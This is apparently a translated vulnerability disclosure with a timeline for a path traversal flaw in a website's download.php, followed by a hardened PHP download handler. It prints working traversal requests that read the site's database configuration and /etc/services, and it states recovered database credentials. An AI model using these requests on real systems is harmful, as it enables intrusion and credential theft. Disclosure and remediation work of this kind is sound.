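2016-01-11: Details reported to the vendor; awaiting vendor handling
2016-01-12: Vendor confirmed; details disclosed only to the vendor
2016-01-22: Details disclosed to core white hats and experts in related fields
2016-02-01: Details disclosed to regular white hats
2016-02-11: Details disclosed to intern white hats
2016-02-22: Details disclosed to the public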
As in the title.
Target: http://**.**.**.**
Constructed request:
http://**.**.**.**/chinese/02_about/download.php?f=../index.php
Database configuration file:
http://**.**.**.**/chinese/02_about/download.php?f=../include/php_script/common.php
In common.php:
$DB_str = "mysql,localhost,gercweb, creative, gerc_ctr";
The GetServerInfo function in database/DB_class.php:
function GetServerInfo($DB_str){
    $DB_info = array(
        'type' => false,
        'host' => false,
        'dbname' => false,
        'user' => false,
        'password' => false
    );
    // Fields are positional: type, host, dbname, user, password
    $Store_info = split(",",$DB_str);
    $DB_info['type'] = $Store_info[0];
    $DB_info['host'] = $Store_info[1];
    $DB_info['dbname'] = $Store_info[2];
    $DB_info['user'] = $Store_info[3];
    $DB_info['password'] = $Store_info[4];
    return $DB_info;
}
The database username and password are therefore creative/gerc_ctr.
System file services:
http://**.**.**.**/chinese/02_about/download.php?f=../../../../../../etc/services
In services:
(omitted)
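The requests above work because download.php passes the f parameter to the filesystem without constraining it to a download directory. As an added example (not code from the affected site, whose download.php source does not appear in this report), the handler below shows one way to reject both f=../index.php and f=../../../../../../etc/services; DOWNLOAD_ROOT, ALLOWED_EXT and resolve_download() are assumed names.

```php
<?php
// Added example: hypothetical hardened download handler.
// DOWNLOAD_ROOT, ALLOWED_EXT and resolve_download() are assumptions,
// not names taken from the affected application.
const DOWNLOAD_ROOT = '/var/www/site/downloads'; // assumed public download directory
const ALLOWED_EXT   = ['pdf', 'doc', 'zip'];     // assumed allow-list of file types

function resolve_download(string $requested, string $root = DOWNLOAD_ROOT): ?string
{
    // Empty names and NUL bytes are never valid.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // Allow-list the extension: stops ../index.php and ../include/.../common.php.
    $ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    // Canonicalise both paths; realpath() resolves ../ and symlinks
    // and returns false when the target does not exist.
    $rootReal = realpath($root);
    $fullReal = realpath($root . DIRECTORY_SEPARATOR . $requested);
    if ($rootReal === false || $fullReal === false) {
        return null;
    }
    // Containment check on the canonical path. The trailing separator
    // keeps /downloads_old from matching /downloads.
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    if (strncmp($fullReal, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($fullReal) ? $fullReal : null;
}

$path = resolve_download((string)($_GET['f'] ?? ''));
if ($path === null) {
    http_response_code(404); // same answer for "missing" and "not allowed"
    exit;
}
header('Content-Type: application/octet-stream');
header('X-Content-Type-Options: nosniff');
header("Content-Disposition: attachment; filename*=UTF-8''" . rawurlencode(basename($path)));
header('Content-Length: ' . filesize($path));
readfile($path);
```

The extension check and the canonical-path check are independent: the first keeps PHP source and configuration files from being served, the second keeps any allowed-looking name from resolving outside the download directory.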
Severity: High
Vulnerability Rank: 16
Confirmed: 2016-01-12 02:14
Thank you for the report.
None yet.